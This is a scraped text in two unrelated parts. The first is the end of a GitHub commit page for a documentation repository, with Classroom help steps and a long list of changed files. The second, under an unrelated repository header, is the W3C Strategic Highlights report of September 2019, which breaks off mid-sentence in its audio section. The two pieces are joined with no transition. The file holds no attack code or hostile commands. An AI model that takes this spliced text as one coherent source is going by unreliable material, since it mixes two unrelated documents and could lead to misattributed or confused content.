reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-settings %} 1. To the right of "Delete this classroom", click **Delete classroom**.  1. **Read the warnings**. 1. To verify that you're deleting the correct classroom, type the name of the classroom you want to delete.  1. Click **Delete classroom**.  22 ...on/manage-coursework-with-github-classroom/run-student-code-in-an-online-ide.md @@ -0,0 +1,22 @@ --- title: Run student code in an online IDE intro: You can run the code from a student assignment within the online integrated development environment (IDE) that you configured for the assignment. versions: free-pro-team: '*' redirect_from: - /education/manage-coursework-with-github-classroom/running-student-code --- ### About student code and online IDEs If you configure an online integrated development environment (IDE) for an assignment, you can run the code within the online IDE. You don't need to clone the assignment repository to your computer. For more information about online IDEs, see "[Integrate {% data variables.product.prodname_classroom %} with an online IDE](/education/manage-coursework-with-github-classroom/integrate-github-classroom-with-an-online-ide)." ### Running student code in the online IDE {% data reusables.classroom.sign-into-github-classroom %} {% data reusables.classroom.click-classroom-in-list %} {% data reusables.classroom.click-assignment-in-list %} 1. To the right of the submission, click **View IDE**.  8 ...ducation/manage-coursework-with-github-classroom/teach-with-github-classroom.md @@ -0,0 +1,8 @@ --- title: Teach with GitHub Classroom intro: Learn how to set up your classroom and assignments. mapTopic: true versions: free-pro-team: '*' --- 93 content/education/manage-coursework-with-github-classroom/use-autograding.md 30 ...t/education/manage-coursework-with-github-classroom/view-autograding-results.md 90 content/education/quickstart.md 1 ...github-education/about-campus-advisors.md → ...github-education/about-campus-advisors.md 1 ...-github-education/about-campus-experts.md → ...-github-education/about-campus-experts.md 1 ...ducation-for-educators-and-researchers.md → ...ducation-for-educators-and-researchers.md 5 ...on/about-github-education-for-students.md → ...on/about-github-education-for-students.md 9 ...ithub-education/about-github-education.md → ...ithub-education/about-github-education.md 5 .../applying-for-a-student-developer-pack.md → ...ion/apply-for-a-student-developer-pack.md 14 ...for-an-educator-or-researcher-discount.md → ...for-an-educator-or-researcher-discount.md 26 content/education/teach-and-learn-with-github-education/index.md 3 ...github-at-your-educational-institution.md → ...github-at-your-educational-institution.md 3 ...ation/using-github-for-your-schoolwork.md → ...ucation/use-github-for-your-schoolwork.md 3 ...-github-in-your-classroom-and-research.md → ...-github-in-your-classroom-and-research.md 5 ...-for-a-student-developer-pack-approved.md → ...-for-a-student-developer-pack-approved.md 3 ...ucator-or-researcher-discount-approved.md → ...ucator-or-researcher-discount-approved.md 20 ...ering-a-repository/enabling-or-disabling-github-discussions-for-a-repository.md 5 content/github/administering-a-repository/index.md 2 content/github/authenticating-to-github/reviewing-your-security-log.md 1 content/github/collaborating-with-issues-and-pull-requests/index.md 74 ...with-issues-and-pull-requests/reviewing-dependency-changes-in-a-pull-request.md 19 ...g-with-issues-and-pull-requests/reviewing-proposed-changes-in-a-pull-request.md 10 content/github/creating-cloning-and-archiving-repositories/about-repositories.md 15 content/github/customizing-your-github-workflow/about-github-marketplace.md 2 content/github/getting-started-with-github/git-and-github-learning-resources.md 4 content/github/getting-started-with-github/github-glossary.md 6 content/github/getting-started-with-github/signing-up-for-a-new-github-account.md 1 content/github/index.md 2 ...b/managing-security-vulnerabilities/about-alerts-for-vulnerable-dependencies.md 25 ...hub/managing-security-vulnerabilities/about-managing-vulnerable-dependencies.md 1 content/github/managing-security-vulnerabilities/index.md 4 ...nerabilities/viewing-and-updating-vulnerable-dependencies-in-your-repository.md 3 ...criptions-and-notifications-on-github/managing-notifications-from-your-inbox.md 6 content/github/managing-your-work-on-github/about-issues.md 3 content/github/searching-for-information-on-github/about-searching-on-github.md 5 content/github/searching-for-information-on-github/index.md 114 content/github/searching-for-information-on-github/searching-discussions.md 2 ...ithub/searching-for-information-on-github/searching-issues-and-pull-requests.md 2 ...nd-managing-billing-and-payments-on-github/about-billing-for-github-sponsors.md 4 ...-billing-and-payments-on-github/discounted-subscriptions-for-github-accounts.md 19 ...ing-up-and-managing-billing-and-payments-on-github/downgrading-a-sponsorship.md 16 ...tting-up-and-managing-billing-and-payments-on-github/upgrading-a-sponsorship.md 4 content/github/setting-up-and-managing-organizations-and-teams/index.md 27 ...and-teams/managing-discussion-creation-for-repositories-in-your-organization.md 25 ...izations-and-teams/managing-updates-from-accounts-your-organization-sponsors.md 3 ...p-and-managing-organizations-and-teams/permission-levels-for-an-organization.md 14 ...ing-organizations-and-teams/repository-permission-levels-for-an-organization.md 86 ...naging-organizations-and-teams/reviewing-the-audit-log-for-your-organization.md 1 content/github/setting-up-and-managing-your-github-user-account/index.md 24 ...etting-up-and-managing-your-github-user-account/managing-your-theme-settings.md 12 content/github/site-policy/github-additional-product-terms.md 8 ...porting-the-open-source-community-with-github-sponsors/about-github-sponsors.md 17 ...community-with-github-sponsors/attributing-sponsorships-to-your-organization.md 28 ...e-open-source-community-with-github-sponsors/changing-your-sponsorship-tiers.md 22 ...th-github-sponsors/configuring-webhooks-for-events-in-your-sponsored-account.md 17 ...ting-the-open-source-community-with-github-sponsors/contacting-your-sponsors.md 25 ...munity-with-github-sponsors/editing-your-profile-details-for-github-sponsors.md 1 content/github/supporting-the-open-source-community-with-github-sponsors/index.md 12 ...ce-community-with-github-sponsors/managing-your-payouts-from-github-sponsors.md 18 ...he-open-source-community-with-github-sponsors/managing-your-sponsorship-goal.md 39 ...ing-the-open-source-community-with-github-sponsors/managing-your-sponsorship.md 10 ...munity-with-github-sponsors/setting-up-github-sponsors-for-your-organization.md 10 ...munity-with-github-sponsors/setting-up-github-sponsors-for-your-user-account.md 62 ...-source-community-with-github-sponsors/sponsoring-an-open-source-contributor.md 27 ...source-community-with-github-sponsors/viewing-your-sponsors-and-sponsorships.md 23 content/github/teaching-and-learning-with-github-education/index.md This file was deleted. 7 ...nt/github/visualizing-repository-data-with-graphs/about-the-dependency-graph.md 1 content/github/working-with-github-support/index.md 10 content/graphql/README.md 58 ...tting-started-with-github-container-registry/about-github-container-registry.md This file was deleted. 15 content/packages/getting-started-with-github-container-registry/index.md This file was deleted. 95 content/packages/guides/about-github-container-registry.md 2 ...ol-and-visibility-for-container-images.md → ...ol-and-visibility-for-container-images.md 5 ...che-maven-for-use-with-github-packages.md → ...che-maven-for-use-with-github-packages.md 1 ...ng-docker-for-use-with-github-packages.md → ...ng-docker-for-use-with-github-packages.md 1 ...otnet-cli-for-use-with-github-packages.md → ...otnet-cli-for-use-with-github-packages.md 1 ...ng-gradle-for-use-with-github-packages.md → ...ng-gradle-for-use-with-github-packages.md 1 ...uring-npm-for-use-with-github-packages.md → ...uring-npm-for-use-with-github-packages.md 1 ...-rubygems-for-use-with-github-packages.md → ...-rubygems-for-use-with-github-packages.md 2 ...ting-a-repository-to-a-container-image.md → ...ting-a-repository-to-a-container-image.md 10 content/packages/guides/container-guides-for-github-packages.md 2 ...er-registry/deleting-a-container-image.md → ...ages/guides/deleting-a-container-image.md 2 ...ry/enabling-improved-container-support.md → ...es/enabling-improved-container-support.md 33 content/packages/guides/index.md 2 ...b-container-registry-for-docker-images.md → ...b-container-registry-for-docker-images.md 10 content/packages/guides/package-client-guides-for-github-packages.md 2 ...stry/pushing-and-pulling-docker-images.md → ...ides/pushing-and-pulling-docker-images.md 1 ...ng-github-packages-with-github-actions.md → ...ng-github-packages-with-github-actions.md 46 content/packages/index.md 60 ...anaging-packages/about-github-packages.md → ...-github-packages/about-github-packages.md 13 ...concepts-for-github-container-registry.md → ...ages/core-concepts-for-github-packages.md 16 content/packages/learn-github-packages/index.md 1 ...managing-packages/publishing-a-package.md → ...n-github-packages/publishing-a-package.md 3 ...d-managing-packages/deleting-a-package.md → ...ges/manage-packages/deleting-a-package.md 8 ...publishing-and-managing-packages/index.md → content/packages/manage-packages/index.md 1 ...managing-packages/installing-a-package.md → ...s/manage-packages/installing-a-package.md 1 ...and-managing-packages/viewing-packages.md → ...kages/manage-packages/viewing-packages.md 11 content/packages/managing-container-images-with-github-container-registry/index.md This file was deleted. 109 content/packages/quickstart.md 20 content/packages/using-github-packages-with-your-projects-ecosystem/index.md This file was deleted. 10 content/rest/README.md 18 content/rest/overview/resources-in-the-rest-api.md 2 content/rest/overview/troubleshooting.md 10 content/rest/reference/enterprise-admin.md 2 data/products.yml 2 data/reusables/accounts/create-account.md 2 data/reusables/actions/actions-not-verified.md 7 data/reusables/actions/visualization-beta.md 5 data/reusables/audit_log/audit-log-api-info.md 1 data/reusables/audit_log/audit-log-git-events-retention.md 1 data/reusables/classroom/about-assignments.md 1 data/reusables/classroom/about-autograding.md 1 data/reusables/classroom/about-classrooms.md 1 data/reusables/classroom/about-online-ides.md 1 data/reusables/classroom/assignments-classroom-prerequisite.md 2 data/reusables/classroom/assignments-click-pencil.md 1 data/reusables/classroom/assignments-group-definition.md 5 data/reusables/classroom/assignments-guide-assign-a-deadline.md 5 data/reusables/classroom/assignments-guide-choose-an-online-ide.md 5 data/reusables/classroom/assignments-guide-choose-template-repository.md 9 data/reusables/classroom/assignments-guide-choose-visibility.md 7 data/reusables/classroom/assignments-guide-click-continue-after-basics.md 7 ...s/classroom/assignments-guide-click-continue-after-starter-code-and-feedback.md 5 data/reusables/classroom/assignments-guide-click-create-assignment-button.md 5 data/reusables/classroom/assignments-guide-create-review-pull-request.md 5 data/reusables/classroom/assignments-guide-create-the-assignment.md 1 data/reusables/classroom/assignments-guide-intro-for-environment.md 3 data/reusables/classroom/assignments-guide-invite-students-to-assignment.md 7 data/reusables/classroom/assignments-guide-prevent-changes.md 23 data/reusables/classroom/assignments-guide-using-autograding.md 1 data/reusables/classroom/assignments-individual-definition.md 1 data/reusables/classroom/assignments-to-prevent-submission.md 5 data/reusables/classroom/assignments-type-a-title.md 1 data/reusables/classroom/classroom-creates-group-repositories.md 1 data/reusables/classroom/classroom-creates-individual-repositories.md 1 data/reusables/classroom/classroom-enables-invitation-urls.md 2 data/reusables/classroom/click-assignment-in-list.md 2 data/reusables/classroom/click-classroom-in-list.md 2 data/reusables/classroom/click-settings.md 2 data/reusables/classroom/click-students.md 1 data/reusables/classroom/for-more-information-about-assignment-creation.md 6 data/reusables/classroom/guide-create-new-classroom.md 5 data/reusables/classroom/invitation-url-warning.md 1 data/reusables/classroom/readme-contains-button-for-online-ide.md 1 data/reusables/classroom/sign-into-github-classroom.md 1 data/reusables/classroom/use-add-test-drop-down-to-click-grading-method.md 1 data/reusables/classroom/you-can-choose-a-template-repository.md 1 data/reusables/classroom/you-can-create-a-pull-request-for-feedback.md 1 data/reusables/classroom/you-may-want-to-predefine-repository-settings.md 1 data/reusables/discussions/about-categories-and-formats.md 1 data/reusables/discussions/about-discussions.md 5 data/reusables/discussions/beta.md 2 data/reusables/discussions/click-discussion-in-list.md 2 data/reusables/discussions/discussions-tab.md 2 data/reusables/discussions/edit-categories.md 1 data/reusables/discussions/edit-category-details.md 8 ...les/discussions/enabling-or-disabling-github-discussions-for-your-repository.md 1 data/reusables/discussions/github-recognizes-members.md 16 data/reusables/discussions/marking-a-comment-as-an-answer.md 1 data/reusables/discussions/repository-category-limit.md 10 data/reusables/discussions/starting-a-discussion.md 1 data/reusables/discussions/you-can-categorize-discussions.md 1 data/reusables/discussions/you-can-convert-an-issue.md 1 data/reusables/discussions/you-can-use-discussions.md 1 data/reusables/discussions/you-cannot-convert-a-discussion.md 2 data/reusables/education/about-github-education-link.md 2 data/reusables/education/apply-for-team.md 2 data/reusables/education/click-get-teacher-benefits.md 6 data/reusables/education/educator-requirements.md 1 data/reusables/gated-features/discussions.md 1 data/reusables/marketplace/app-transfer-to-org-for-verification.md 5 data/reusables/marketplace/free-plan-note.md 2 data/reusables/marketplace/launch-with-free.md 8 data/reusables/marketplace/marketplace-billing-ui-requirements.md 2 data/reusables/package_registry/billing-for-container-registry.md 2 data/reusables/package_registry/container-registry-beta-billing-note.md 2 data/reusables/package_registry/container-registry-beta.md 2 data/reusables/package_registry/docker_registry_deprecation_status.md 2 data/reusables/package_registry/feature-preview-for-container-registry.md 2 data/reusables/package_registry/required-scopes.md 2 data/reusables/package_registry/viewing-packages.md 3 data/reusables/repositories/dependency-review.md 7 data/reusables/repositories/navigate-to-job-superlinter.md 4 data/reusables/repositories/view-failed-job-results-superlinter.md 4 data/reusables/repositories/view-specific-line-superlinter.md 2 data/reusables/search/date_gt_lt.md 2 data/reusables/sponsors/billing-switcher.md 2 data/reusables/sponsors/change-tier.md 2 data/reusables/sponsors/choose-updates.md 2 data/reusables/sponsors/developer-sponsored-choose-updates.md This file was deleted. 4 data/reusables/sponsors/manage-developer-sponsorship.md This file was deleted. 4 data/reusables/sponsors/manage-org-sponsorship.md This file was deleted. 2 data/reusables/sponsors/manage-sponsorship.md 1 data/reusables/sponsors/manage-updates-for-orgs.md 2 data/reusables/sponsors/maximum-tier.md 4 data/reusables/sponsors/navigate-to-org-sponsors-dashboard.md This file was deleted. 2 ...onsors/navigate-to-sponsored-developer.md → ...sponsors/navigate-to-sponsored-account.md 1 data/reusables/sponsors/navigate-to-sponsored-org.md This file was deleted. 2 ...ors/navigate-to-dev-sponsors-dashboard.md → ...ponsors/navigate-to-sponsors-dashboard.md 2 data/reusables/sponsors/no-fees.md 5 data/reusables/sponsors/org-sponsors-release-phase.md 2 data/reusables/sponsors/pay-prorated-amount.md 2 data/reusables/sponsors/prorated-sponsorship.md 2 data/reusables/sponsors/sponsor-account.md 7 data/reusables/sponsors/sponsorship-dashboard.md 2 data/reusables/sponsors/sponsorship-details.md 1 data/reusables/webhooks/app_always_desc.md 3 data/ui.yml 7 data/variables/action_code_examples.yml 37 data/variables/discussions_community_examples.yml 6 data/variables/product.yml 21 includes/all-articles.html 4 includes/breadcrumbs.html 2 includes/code-example-card.html 14 includes/discussions-community-card.html 2 includes/header-notification.html 90 javascripts/filter-cards.js 92 javascripts/filter-code-examples.js This file was deleted. 4 javascripts/index.js 64 layouts/product-landing.html 68 lib/data-directory.js 28 lib/filename-to-key.js 7 lib/frontmatter.js 2 lib/liquid-tags/data.js 25 lib/page.js 54 lib/pages.js 21 lib/redirects/get-docs-path-from-developer-path.js 41 lib/redirects/precompile.js 231 lib/rest/static/decorated/api.github.com.json 495 lib/rest/static/dereferenced/api.github.com.deref.json 17 lib/rewrite-local-links.js 10 lib/site-data.js 24 lib/warm-server.js 5 middleware/breadcrumbs.js 38 middleware/categories-for-support-team.js 6 middleware/contextualizers/early-access-links.js 103 middleware/csp.js 69 middleware/early-access-breadcrumbs.js 1 middleware/index.js 45 package-lock.json 3 package.json 4 script/check-s3-images.js 4 script/early-access/clone-locally 41 script/early-access/create-branch 7 server.js 2 stylesheets/article.scss 4 tests/browser/browser.js 10 tests/content/category-pages.js 2 tests/content/crowdin-config.js 3 tests/content/featured-links.js 5 tests/content/glossary.js 42 tests/content/remove-liquid-statements.js 39 tests/content/site-data-references.js 4 tests/content/site-data.js 22 tests/fixtures/rest-redirects.json 10 tests/graphql/build-changelog-test.js 9 tests/helpers/conditional-runs.js 20 tests/meta/orphan-tests.js 23 tests/rendering/breadcrumbs.js 4 tests/rendering/rest.js 3 tests/rendering/server.js 47 tests/routing/developer-site-redirects.js 10 tests/routing/redirects.js 15 tests/unit/data-directory/filename-to-key.js 1 tests/unit/data-directory/fixtures/README.md 1 tests/unit/data-directory/fixtures/bar.yaml 1 tests/unit/data-directory/fixtures/foo.json 1 tests/unit/data-directory/fixtures/nested/baz.md 40 tests/unit/data-directory/index.js 19 tests/unit/early-access.js 4 tests/unit/find-page.js 57 tests/unit/liquid-helpers.js 140 tests/unit/page.js 2 tests/unit/pages.js 0 comments on commit 1a56ed1 Leave a comment You’re not receiving notifications from this thread. © 2021 GitHub, Inc. Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About
jettbrains / L W3C Strategic Highlights September 2019 This report was prepared for the September 2019 W3C Advisory Committee Meeting (W3C Member link). See the accompanying W3C Fact Sheet — September 2019. For the previous edition, see the April 2019 W3C Strategic Highlights. For future editions of this report, please consult the latest version. A Chinese translation is available. ☰ Contents Introduction Future Web Standards Meeting Industry Needs Web Payments Digital Publishing Media and Entertainment Web & Telecommunications Real-Time Communications (WebRTC) Web & Networks Automotive Web of Things Strengthening the Core of the Web HTML CSS Fonts SVG Audio Performance Web Performance WebAssembly Testing Browser Testing and Tools WebPlatform Tests Web of Data Web for All Security, Privacy, Identity Internationalization (i18n) Web Accessibility Outreach to the world W3C Developer Relations W3C Training Translations W3C Liaisons Introduction This report highlights recent work of enhancement of the existing landscape of the Web platform and innovation for the growth and strength of the Web. 33 working groups and a dozen interest groups enable W3C to pursue its mission through the creation of Web standards, guidelines, and supporting materials. We track the tremendous work done across the Consortium through homogeneous work-spaces in Github which enables better monitoring and management. We are in the middle of a period where we are chartering numerous working groups which demonstrate the rapid degree of change for the Web platform: After 4 years, we are nearly ready to publish a Payment Request API Proposed Recommendation and we need to soon charter follow-on work. In the last year we chartered the Web Payment Security Interest Group. In the last year we chartered the Web Media Working Group with 7 specifications for next generation Media support on the Web. We have Accessibility Guidelines under W3C Member review which includes Silver, a new approach. We have just launched the Decentralized Identifier Working Group which has tremendous potential because Decentralized Identifier (DID) is an identifier that is globally unique, resolveable with high availability, and cryptographically verifiable. We have Privacy IG (PING) under W3C Member review which strengthens our focus on the tradeoff between privacy and function. We have a new CSS charter under W3C Member review which maps the group's work for the next three years. In this period, W3C and the WHATWG have succesfully completed the negotiation of a Memorandum of Understanding rooted in the mutual belief that that having two distinct specifications claiming to be normative is generally harmful for the Web community. The MOU, signed last May, describes how the two organizations are to collaborate on the development of a single authoritative version of the HTML and DOM specifications. W3C subsequently rechartered the HTML Working Group to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and for the production of W3C Recommendations from WHATWG Review Drafts. As the Web evolves continuously, some groups are looking for ways for specifications to do so as well. So-called "evergreen recommendations" or "living standards" aim to track continuous development (and maintenance) of features, on a feature-by-feature basis, while getting review and patent commitments. We see the maturation and further development of an incredible number of new technologies coming to the Web. Continued progress in many areas demonstrates the vitality of the W3C and the Web community, as the rest of the report illustrates. Future Web Standards W3C has a variety of mechanisms for listening to what the community thinks could become good future Web standards. These include discussions with the Membership, discussions with other standards bodies, the activities of thousands of participants in over 300 community groups, and W3C Workshops. There are lots of good ideas. The W3C strategy team has been identifying promising topics and invites public participation. Future, recent and under consideration Workshops include: Inclusive XR (5-6 November 2019, Seattle, WA, USA) to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive, including to people with disabilities; W3C Workshop on Data Models for Transportation (12-13 September 2019, Palo Alto, CA, USA) W3C Workshop on Web Games (27-28 June 2019, Redmond, WA, USA), view report Second W3C Workshop on the Web of Things (3-5 June 2019, Munich, Germany) W3C Workshop on Web Standardization for Graph Data; Creating Bridges: RDF, Property Graph and SQL (4-6 March 2019, Berlin, Germany), view report Web & Machine Learning. The Strategy Funnel documents the staff's exploration of potential new work at various phases: Exploration and Investigation, Incubation and Evaluation, and eventually to the chartering of a new standards group. The Funnel view is a GitHub Project where new area are issues represented by “cards” which move through the columns, usually from left to right. Most cards start in Exploration and move towards Chartering, or move out of the funnel. Public input is welcome at any stage but particularly once Incubation has begun. This helps W3C identify work that is sufficiently incubated to warrant standardization, to review the ecosystem around the work and indicate interest in participating in its standardization, and then to draft a charter that reflects an appropriate scope. Ongoing feedback can speed up the overall standardization process. Since the previous highlights document, W3C has chartered a number of groups, and started discussion on many more: Newly Chartered or Rechartered Web Application Security WG (03-Apr) Web Payment Security IG (17-Apr) Patent and Standards IG (24-Apr) Web Applications WG (14-May) Web & Networks IG (16-May) Media WG (23-May) Media and Entertainment IG (06-Jun) HTML WG (06-Jun) Decentralized Identifier WG (05-Sep) Extended Privacy IG (PING) (30-Sep) Verifiable Claims WG (30-Sep) Service Workers WG (31-Dec) Dataset Exchange WG (31-Dec) Web of Things Working Group (31-Dec) Web Audio Working Group (31-Dec) Proposed charters / Advance Notice Accessibility Guidelines WG Privacy IG (PING) RDF Literal Direction WG Timed Text WG CSS WG Web Authentication WG Closed Internationalization Tag Set IG Meeting Industry Needs Web Payments All Web Payments specifications W3C's payments standards enable a streamlined checkout experience, enabling a consistent user experience across the Web with lower front end development costs for merchants. Users can store and reuse information and more quickly and accurately complete online transactions. The Web Payments Working Group has republished Payment Request API as a Candidate Recommendation, aiming to publish a Proposed Recommendation in the Fall 2019, and is discussing use cases and features for Payment Request after publication of the 1.0 Recommendation. Browser vendors have been finalizing implementation of features added in the past year (view the implementation report). As work continues on the Payment Handler API and its implementation (currently in Chrome and Edge Canary), one focus in 2019 is to increase adoption in other browsers. Recently, Mastercard demonstrated the use of Payment Request API to carry out EMVCo's Secure Remote Commerce (SRC) protocol whose payment method definition is being developed with active participation by Visa, Mastercard, American Express, and Discover. Payment method availability is a key factor in merchant considerations about adopting Payment Request API. The ability to get uniform adoption of a new payment method such as Secure Remote Commerce (SRC) also depends on the availability of the Payment Handler API in browsers, or of proprietary alternatives. Web Monetization, which the Web Payments Working Group will discuss again at its face-to-face meeting in September, can be used to enable micropayments as an alternative revenue stream to advertising. Since the beginning of 2019, Amazon, Brave Software, JCB, Certus Cybersecurity Solutions and Netflix have joined the Web Payments Working Group. In April, W3C launched the Web Payment Security Group to enable W3C, EMVCo, and the FIDO Alliance to collaborate on a vision for Web payment security and interoperability. Participants will define areas of collaboration and identify gaps between existing technical specifications in order to increase compatibility among different technologies, such as: How do SRC, FIDO, and Payment Request relate? The Payment Services Directive 2 (PSD2) regulations in Europe are scheduled to take effect in September 2019. What is the role of EMVCo, W3C, and FIDO technologies, and what is the current state of readiness for the deadline? How can we improve privacy on the Web at the same time as we meet industry requirements regarding user identity? Digital Publishing All Digital Publishing specifications, Publication milestones The Web is the universal publishing platform. Publishing is increasingly impacted by the Web, and the Web increasingly impacts Publishing. Topic of particular interest to Publishing@W3C include typography and layout, accessibility, usability, portability, distribution, archiving, offline access, print on demand, and reliable cross referencing. And the diverse publishing community represented in the groups consist of the traditional "trade" publishers, ebook reading system manufacturers, but also publishers of audio book, scholarly journals or educational materials, library scientists or browser developers. The Publishing Working Group currently concentrates on Audiobooks which lack a comprehensive standard, thus incurring extra costs and time to publish in this booming market. Active development is ongoing on the future standard: Publication Manifest Audiobook profile for Web Publications Lightweight Packaging Format The BD Comics Manga Community Group, the Synchronized Multimedia for Publications Community Group, the Publishing Community Group and a future group on archival, are companions to the working group where specific work is developed and incubated. The Publishing Community Group is a recently launched incubation channel for Publishing@W3C. The goal of the group is to propose, document, and prototype features broadly related to: publications on the Web reading modes and systems and the user experience of publications The EPUB 3 Community Group has successfully completed the revision of EPUB 3.2. The Publishing Business Group fosters ongoing participation by members of the publishing industry and the overall ecosystem in the development of Web infrastructure to better support the needs of the industry. The Business Group serves as an additional conduit to the Publishing Working Group and several Community Groups for feedback between the publishing ecosystem and W3C. The Publishing BG has played a vital role in fostering and advancing the adoption and continued development of EPUB 3. In particular the BG provided critical support to the update of EPUBCheck to validate EPUB content to the new EPUB 3.2 specification. This resulted in the development, in conjunction with the EPUB3 Community Group, of a new generation of EPUBCheck, i.e., EPUBCheck 4.2 production-ready release. Media and Entertainment All Media specifications The Media and Entertainment vertical tracks media-related topics and features that create immersive experiences for end users. HTML5 brought standard audio and video elements to the Web. Standardization activities since then have aimed at turning the Web into a professional platform fully suitable for the delivery of media content and associated materials, enabling missing features to stream video content on the Web such as adaptive streaming and content protection. Together with Microsoft, Comcast, Netflix and Google, W3C received an Technology & Engineering Emmy Award in April 2019 for standardization of a full TV experience on the Web. Current goals are to: Reinforce core media technologies: Creation of the Media Working Group, to develop media-related specifications incubated in the WICG (e.g. Media Capabilities, Picture-in-picture, Media Session) and maintain maintain/evolve Media Source Extensions (MSE) and Encrypted Media Extensions (EME). Improve support for Media Timed Events: data cues incubation. Enhance color support (HDR, wide gamut), in scope of the CSS WG and in the Color on the Web CG. Reduce fragmentation: Continue annual releases of a common and testable baseline media devices, in scope of the Web Media APIs CG and in collaboration with the CTA WAVE Project. Maintain the Road-map of Media Technologies for the Web which highlights Web technologies that can be used to build media applications and services, as well as known gaps to enable additional use cases. Create the future: Discuss perspectives for Media and Entertainment for the Web. Bring the power of GPUs to the Web (graphics, machine learning, heavy processing), under incubation in the GPU for the Web CG. Transition to a Working Group is under discussion. Determine next steps after the successful W3C Workshop on Web Games of June 2019. View the report. Timed Text The Timed Text Working Group develops and maintains formats used for the representation of text synchronized with other timed media, like audio and video, and notably works on TTML, profiles of TTML, and WebVTT. Recent progress includes: A robust WebVTT implementation report poises the specification for publication as a proposed recommendation. Discussions around re-chartering, notably to add a TTML Profile for Audio Description deliverable to the scope of the group, and clarify that rendering of captions within XR content is also in scope. Immersive Web Hardware that enables Virtual Reality (VR) and Augmented Reality (AR) applications are now broadly available to consumers, offering an immersive computing platform with both new opportunities and challenges. The ability to interact directly with immersive hardware is critical to ensuring that the web is well equipped to operate as a first-class citizen in this environment. The Immersive Web Working Group has been stabilizing the WebXR Device API while the companion Immersive Web Community Group incubates the next series of features identified as key for the future of the Immersive Web. W3C plans a workshop focused on the needs and benefits at the intersection of VR & Accessibility (Inclusive XR), on 5-6 November 2019 in Seattle, WA, USA, to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive. Web & Telecommunications The Web is the Open Platform for Mobile. Telecommunication service providers and network equipment providers have long been critical actors in the deployment of Web technologies. As the Web platform matures, it brings richer and richer capabilities to extend existing services to new users and devices, and propose new and innovative services. Real-Time Communications (WebRTC) All Real-Time Communications specifications WebRTC has reshaped the whole communication landscape by making any connected device a potential communication end-point, bringing audio and video communications anywhere, on any network, vastly expanding the ability of operators to reach their customers. WebRTC serves as the corner-stone of many online communication and collaboration services. The WebRTC Working Group aims to bringing WebRTC 1.0 (and companion specification Media Capture and Streams) to Recommendation by the end of 2019. Intense efforts are focused on testing (supported by a dedicated hackathon at IETF 104) and interoperability. The group is considering pushing features that have not gotten enough traction to separate modules or to a later minor revision of the spec. Beyond WebRTC 1.0, the WebRTC Working Group will focus its efforts on WebRTC NV which the group has started documenting by identifying use cases. Web & Networks Recently launched, in the wake of the May 2018 Web5G workshop, the Web & Networks Interest Group is chaired by representatives from AT&T, China Mobile and Intel, with a goal to explore solutions for web applications to achieve better performance and resource allocation, both on the device and network. The group's first efforts are around use cases, privacy & security requirements and liaisons. Automotive All Automotive specifications To create a rich application ecosystem for vehicles and other devices allowed to connect to the vehicle, the W3C Automotive Working Group is delivering a service specification to expose all common vehicle signals (engine temperature, fuel/charge level, range, tire pressure, speed, etc.) The Vehicle Information Service Specification (VISS), which is a Candidate Recommendation, is seeing more implementations across the industry. It provides the access method to a common data model for all the vehicle signals –presently encapsulating a thousand or so different data elements– and will be growing to accommodate the advances in automotive such as autonomous and driver assist technologies and electrification. The group is already working on a successor to VISS, leveraging the underlying data model and the VIWI submission from Volkswagen, for a more robust means of accessing vehicle signals information and the same paradigm for other automotive needs including location-based services, media, notifications and caching content. The Automotive and Web Platform Business Group acts as an incubator for prospective standards work. One of its task forces is using W3C VISS in performing data sampling and off-boarding the information to the cloud. Access to the wealth of information that W3C's auto signals standard exposes is of interest to regulators, urban planners, insurance companies, auto manufacturers, fleet managers and owners, service providers and others. In addition to components needed for data sampling and edge computing, capturing user and owner consent, information collection methods and handling of data are in scope. The upcoming W3C Workshop on Data Models for Transportation (September 2019) is expected to focus on the need of additional ontologies around transportation space. Web of Things All Web of Things specifications W3C's Web of Things work is designed to bridge disparate technology stacks to allow devices to work together and achieve scale, thus enabling the potential of the Internet of Things by eliminating fragmentation and fostering interoperability. Thing descriptions expressed in JSON-LD cover the behavior, interaction affordances, data schema, security configuration, and protocol bindings. The Web of Things complements existing IoT ecosystems to reduce the cost and risk for suppliers and consumers of applications that create value by combining multiple devices and information services. There are many sectors that will benefit, e.g. smart homes, smart cities, smart industry, smart agriculture, smart healthcare and many more. The Web of Things Working Group is finishing the initial Web of Things standards, with support from the Web of Things Interest Group: Web of Things Architecture Thing Descriptions Strengthening the Core of the Web HTML The HTML Working Group was chartered early June to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and to produce W3C Recommendations from WHATWG Review Drafts. A few days before, W3C and the WHATWG signed a Memorandum of Understanding outlining the agreement to collaborate on the development of a single version of the HTML and DOM specifications. Issues and proposed solutions for HTML and DOM done via the newly rechartered HTML Working Group in the WHATWG repositories The HTML Working Group is targetting November 2019 to bring HTML and DOM to Candidate Recommendations. CSS All CSS specifications CSS is a critical part of the Open Web Platform. The CSS Working Group gathers requirements from two large groups of CSS users: the publishing industry and application developers. Within W3C, those groups are exemplified by the Publishing groups and the Web Platform Working Group. The former requires things like better pagination support and advanced font handling, the latter needs intelligent (and fast!) scrolling and animations. What we know as CSS is actually a collection of almost a hundred specifications, referred to as ‘modules’. The current state of CSS is defined by a snapshot, updated once a year. The group also publishes an index defining every term defined by CSS specifications. Fonts All Fonts specifications The Web Fonts Working Group develops specifications that allow the interoperable deployment of downloadable fonts on the Web, with a focus on Progressive Font Enrichment as well as maintenance of WOFF Recommendations. Recent and ongoing work includes: Early API experiments by Adobe and Monotype have demonstrated the feasibility of a font enrichment API, where a server delivers a font with minimal glyph repertoire and the client can query the full repertoire and request additional subsets on-the-fly. In other experiments, the Brotli compression used in WOFF 2 was extended to support shared dictionaries and patch update. Metrics to quantify improvement are a current hot discussion topic. The group will meet at ATypi 2019 in Japan, to gather requirements from the international typography community. The group will first produce a report summarizing the strengths and weaknesses of each prototype solution by Q2 2020. SVG All SVG specifications SVG is an important and widely-used part of the Open Web Platform. The SVG Working Group focuses on aligning the SVG 2.0 specification with browser implementations, having split the specification into a currently-implemented 2.0 and a forward-looking 2.1. Current activity is on stabilization, increased integration with the Open Web Platform, and test coverage analysis. The Working Group was rechartered in March 2019. A new work item concerns native (non-Web-browser) uses of SVG as a non-interactive, vector graphics format. Audio The Web Audio Working Group was extended to finish its work on the Web Audio API, expecting to publish it as a Recommendation by year 